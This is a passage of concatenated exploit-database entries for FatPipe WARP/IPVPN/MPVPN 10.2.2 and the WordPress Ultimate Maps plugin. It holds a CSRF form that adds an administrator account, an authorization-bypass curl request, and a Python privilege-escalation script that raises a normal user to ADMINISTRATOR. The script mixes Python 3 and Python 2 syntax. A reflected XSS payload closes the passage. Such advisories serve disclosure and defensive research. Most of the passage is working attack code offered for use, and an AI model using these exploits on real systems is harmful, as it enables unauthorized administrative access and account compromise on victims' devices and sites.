to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
you need to keep your VPN up and running despite failures of service, line,
software, or hardware.
Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: Apache-Coyote/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5681
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5681.php
30.05.2016
25.07.2021
-->
<html>
<body>
<form action="https://10.0.0.7/fpui/userServlet?loadType=set&block=userSetRequest" method="POST">
<input type="hidden" name="userList" value='[{"userName":"adminz","privilege":"1","password":"TestPwd17","action":"add","state":false}]' />
<input type="submit" value="Submit" />
</form>
</body>
</html>
# Exploit Title: FatPipe Networks WARP 10.2.2 - Authorization Bypass
# Date: 25.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.fatpipeinc.com
FatPipe Networks WARP 10.2.2 Authorization Bypass
Vendor: FatPipe Networks Inc.
Product web page: https://www.fatpipeinc.com
Affected version: WARP
10.2.2r38
10.2.2r25
10.2.2r10
10.1.2r60p82
10.1.2r60p71
10.1.2r60p65
10.1.2r60p58s1
10.1.2r60p58
10.1.2r60p55
10.1.2r60p45
10.1.2r60p35
10.1.2r60p32
10.1.2r60p13
10.1.2r60p10
9.1.2r185
9.1.2r180p2
9.1.2r165
9.1.2r164p5
9.1.2r164p4
9.1.2r164
9.1.2r161p26
9.1.2r161p20
9.1.2r161p17
9.1.2r161p16
9.1.2r161p12
9.1.2r161p3
9.1.2r161p2
9.1.2r156
9.1.2r150
9.1.2r144
9.1.2r129
7.1.2r39
6.1.2r70p75-m
6.1.2r70p45-m
6.1.2r70p26
5.2.0r34
Summary: FatPipe Networks invented the concept of router-clustering,
which provides the highest level of reliability, redundancy, and speed
of Internet traffic for Business Continuity and communications. FatPipe
WARP achieves fault tolerance for companies by creating an easy method
of combining two or more Internet connections of any kind over multiple
ISPs. FatPipe utilizes all paths when the lines are up and running,
dynamically balancing traffic over the multiple lines, and intelligently
failing over inbound and outbound IP traffic when ISP services and/or
components fail.
Desc: Improper access control occurs when the application provides direct
access to objects based on user-supplied input. As a result of this vulnerability
attackers can bypass authorization and access resources behind protected
pages.
Tested on: Apache-Coyote/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5682
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5682.php
30.05.2016
25.07.2021
--
$ curl -vk "https://10.0.0.9/fpui/jsp/index.jsp"
# Exploit Title: FatPipe Networks MPVPN 10.2.2 - Remote Privilege Escalation
# Date: 25.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.fatpipeinc.com
#!/usr/bin/env python3
#
#
# FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation
#
#
# Vendor: FatPipe Networks Inc.
# Product web page: https://www.fatpipeinc.com
# Affected version: WARP / IPVPN / MPVPN
# 10.2.2r38
# 10.2.2r25
# 10.2.2r10
# 10.1.2r60p82
# 10.1.2r60p71
# 10.1.2r60p65
# 10.1.2r60p58s1
# 10.1.2r60p58
# 10.1.2r60p55
# 10.1.2r60p45
# 10.1.2r60p35
# 10.1.2r60p32
# 10.1.2r60p13
# 10.1.2r60p10
# 9.1.2r185
# 9.1.2r180p2
# 9.1.2r165
# 9.1.2r164p5
# 9.1.2r164p4
# 9.1.2r164
# 9.1.2r161p26
# 9.1.2r161p20
# 9.1.2r161p17
# 9.1.2r161p16
# 9.1.2r161p12
# 9.1.2r161p3
# 9.1.2r161p2
# 9.1.2r156
# 9.1.2r150
# 9.1.2r144
# 9.1.2r129
# 7.1.2r39
# 6.1.2r70p75-m
# 6.1.2r70p45-m
# 6.1.2r70p26
# 5.2.0r34
#
# Summary: FatPipe Networks invented the concept of router-clustering,
# which provides the highest level of reliability, redundancy, and speed
# of Internet traffic for Business Continuity and communications. FatPipe
# WARP achieves fault tolerance for companies by creating an easy method
# of combining two or more Internet connections of any kind over multiple
# ISPs. FatPipe utilizes all paths when the lines are up and running,
# dynamically balancing traffic over the multiple lines, and intelligently
# failing over inbound and outbound IP traffic when ISP services and/or
# components fail.
#
# FatPipe IPVPN balances load and provides reliability among multiple
# managed and CPE based VPNs as well as dedicated private networks. FatPipe
# IPVPN can also provide you an easy low-cost migration path from private
# line, Frame or Point-to-Point networks. You can aggregate multiple private,
# MPLS and public networks without additional equipment at the provider's
# site.
#
# FatPipe MPVPN, a patented router clustering device, is an essential part
# of Disaster Recovery and Business Continuity Planning for Virtual Private
# Network (VPN) connectivity. It makes any VPN up to 900% more secure and
# 300% times more reliable, redundant and faster. MPVPN can take WANs with
# an uptime of 99.5% or less and make them 99.999988% or higher, providing
# a virtually infallible WAN. MPVPN dynamically balances load over multiple
# lines and ISPs without the need for BGP programming. MPVPN aggregates up
# to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
# you need to keep your VPN up and running despite failures of service, line,
# software, or hardware.
#
# Desc: The application suffers from a privilege escalation vulnerability.
# A normal user (group USER, 0) can elevate her privileges by sending a HTTP
# POST request and setting the JSON parameter 'privilege' to integer value
# '1' gaining administrative rights (group ADMINISTRATOR, 1).
#
# Tested on: Apache-Coyote/1.1
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2021-5685
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php
#
#
# 30.05.2016
# 25.07.2021
#
#
import sys
import time#######
import requests################
requests.packages.urllib3.disable_warnings()
if len(sys.argv) !=2:
print
print("********************************************************")
print("* *")
print("* Privilege escalation from USER to ADMINISTRATOR role *")
print("* in *")
print("* FatPipe WARP/IPVPN/MPVPN v10.2.2 *")
print("* *")
print("* ZSL-2021-5685 *")
print("* *")
print("********************************************************")
print("\n[POR] Usage: ./escalator.py [IP]")
sys.exit()
ajpi=sys.argv[1]
print
juzer=raw_input("[UNE] Username: ")
pasvord=raw_input("[UNE] Password: ")
sesija=requests.session()
logiranje={'loginParams':'{\"username\":\"'+juzer+'\",\"password\":\"'+pasvord+'\",\"authType\":0}'}
hederi={'Sec-Ch-Ua' :'\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"92\"',
'Accept' :'application/json, text/javascript, */*; q=0.01',
'X-Requested-With':'XMLHttpRequest',
'Sec-Ch-Ua-Mobile':'?0',
'User-Agent' :'Fatnet/1.b',
'Content-Type' :'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' :'https://'+ajpi,
'Sec-Fetch-Site' :'same-origin',
'Sec-Fetch-Mode' :'cors',
'Sec-Fetch-Dest' :'empty',
'Referer' :'https://'+ajpi+'/fpui/dataCollectionServlet',
'Accept-Encoding' :'gzip, deflate',
'Accept-Language' :'en-US,en;q=0.9',
'Connection' :'close'}
juarel1='https://'+ajpi+'/fpui/loginServlet'
alo=sesija.post(juarel1,headers=hederi,data=logiranje,verify=False)
if not 'success' in alo.text:
print('[GRE] Login error.')
sys.exit()
else:
print('[POR] Authentication successful.')
print('[POR] Climbing the ladder...')
sluba='''
|| || .--._
||====|| __ '---._)
|| ||"")\ Q Q )
||====|| =_/ o /
|| || | \_.-;-'-,._
||====|| | ' o---o )
|| || \ /H __H\ /
||====|| '-' \"")\/ |
|| || _ |_='-)_/
||====|| / '. )
|| || / /
||====|| |___/\| /
|| || |_| | |
||====|| / ) \\ \\
|| || (__/ \___\\
||====|| \_\\
|| || / )
||====|| (__/
'''
for k in sluba:
sys.stdout.write(k)
sys.stdout.flush()
time.sleep(0.01)
juarel2='https://'+ajpi+'/fpui/userServlet?loadType=set&block=userSetRequest'
posta={
'userList':'[{\"userName\":\"'+juzer+'\",\"oldUserName\":\"'+juzer+'\",\"privilege\":\"1\",\"password\":\"'+pasvord+'\",\"action\":\"edit\",\"state\":false}]'
}
stanje=sesija.post(juarel2,headers=hederi,data=posta,verify=False)
if not 'true' in stanje.text:
print('\n[GRE] Something\'s fishy!')
sys.exit()
else:
print('\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.')
sys.exit()
# Exploit Title: WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/ultimate-maps-by-supsystic/
# Version: 1.2.4
# Tested on: Windows 10
# CVE: CVE-2021-24274
1. Description:
The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
2. Proof of Concept:
/wp-admin/admin.php?page=ultimate-maps-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//